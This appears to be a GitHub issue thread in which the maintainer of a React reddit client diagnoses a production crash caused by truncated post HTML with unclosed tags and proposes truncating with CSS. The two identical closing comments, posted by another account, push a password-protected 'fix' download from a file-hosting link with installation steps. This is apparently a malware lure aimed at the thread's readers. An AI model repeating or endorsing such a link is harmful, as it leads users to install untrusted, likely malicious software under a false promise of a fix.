### ISSUE TITLE
Rendering post text crashed production

### ISSUE THREAD

**Issue by travisjupp** [travisjupp/reddit-client#28]
## Problem and cause
The post components `renderPostText` method truncates post text HTML `postTextHtml` leaving unclosed tags and, depending on the structure of the HTML parsed by react-markdown, can crash the site. The site was not responding this morning so I rolled back to commit e4482d9 and all was well.

The bad commit, I believe is 3b7613f (Display truncated post text on click). Note that the site will not always crash as `postTextHtml` changes throughout the day depending on what posts are currently published on reddit.

## Solution

Do not truncate HTML, use CSS to hide/truncate unexpanded post text.

If truncating HTML is necessary (which at this time it is NOT), orphaned HTML tags would need to be removed or closing tags added. So we don't have something like:

```HTML
<div class="d-md-none ps-0 pe-0 pt-0 pb-3"><div class="md"><p>Tiny update: Steffan has seen this post. He is<span class="text-primary">...more
```
Which react-markdown _might_ choke on.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
